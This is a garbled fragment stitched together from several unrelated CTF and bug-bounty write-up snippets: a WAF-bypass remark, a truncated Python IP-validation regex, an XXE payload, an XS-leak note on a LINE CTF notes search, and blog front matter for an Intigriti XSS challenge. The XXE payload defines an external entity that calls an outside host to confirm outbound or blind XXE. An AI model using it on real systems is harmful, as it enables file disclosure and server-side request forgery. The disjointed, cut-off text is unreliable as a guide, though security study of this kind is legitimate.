The goal was to bypass WAF protection to access local resources.
app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')
def valid_ip(ip):
matches = app.re_ip.match(ip)
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
XS-leaks while download in headless-chrome.
There is a feature to search the note and a download option, so visiting the following page http://34.84.72.167/search?q=LINECTF{&download downloads a json file if the param value of q
exists in notes.
Download doesn't work in headless chrome, so it throws an error.
page.goto(url).then(() => {
layout | title | subtitle | cover-img | thumbnail-img | share-img | tags | |
---|---|---|---|---|---|---|---|
post |
Intigriti's Nov XSS Challenge Writeup |
XSS |
/assets/img/wsc.jpg |
/assets/img/wsc.jpg |
/assets/img/wsc.jpg |
|